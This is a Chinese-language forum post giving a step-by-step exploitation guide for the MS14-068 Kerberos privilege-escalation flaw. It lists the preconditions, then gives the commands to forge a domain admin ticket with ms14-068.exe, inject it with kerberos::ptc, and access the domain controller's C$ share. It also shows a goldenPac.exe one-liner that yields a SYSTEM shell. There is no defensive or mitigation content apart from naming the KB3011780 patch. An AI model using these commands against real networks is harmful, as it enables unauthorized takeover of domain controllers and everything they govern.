ToB企服应用市场:ToB评测及商务社交产业平台
标题:
ms14-068漏洞
[打印本页]
作者:
篮之新喜
时间:
2023-6-12 00:35
标题:
ms14-068漏洞
ms14-068漏洞
目录
ms14-068漏洞
一、ms14-068漏洞介绍
二、ms14-068漏洞利用条件
三、ms14-068漏洞利用步骤
四、利用goldenPac.exe工具
一、ms14-068漏洞介绍
ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。
二、ms14-068漏洞利用条件
1、获取域普通用户的账号密码
2、获取域普通用户的sid
3、服务器未打KB3011780补丁
三、ms14-068漏洞利用步骤
1、查看域用户的SID
whoami /all
复制代码
2、清除内存中的票据
klist purge
复制代码
3、通过ms14-068.exe生成票据
ms14-068.exe -u 域用户@域名 -p 域用户密码 -s 域用户SID -d 域控
复制代码
4、导入票据到内存
kerberos::ptc 票据名字
复制代码
5、测试是否成功(注意是机器名不是IP)
dir \\dc.candada.com\c$
复制代码
6、可配合计划任务、服务或者PsExec工具上线
四、利用goldenPac.exe工具
它是MS14-068+psexec的组合,因此使用起来非常放方便快捷,一条命令可拿到system权限。
利用:
goldenPac.exe 域名/域用户名:域用户明文密码@域控完整域名
复制代码
条件:
1、获取域普通用户的账号密码
2、获取域普通用户的sid
3、服务器未打KB3011780补丁
4、需要远程桌面(使用这个工具,运行了一条命令后,如果成功则会拿到一共反弹shell,CS没法用)
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4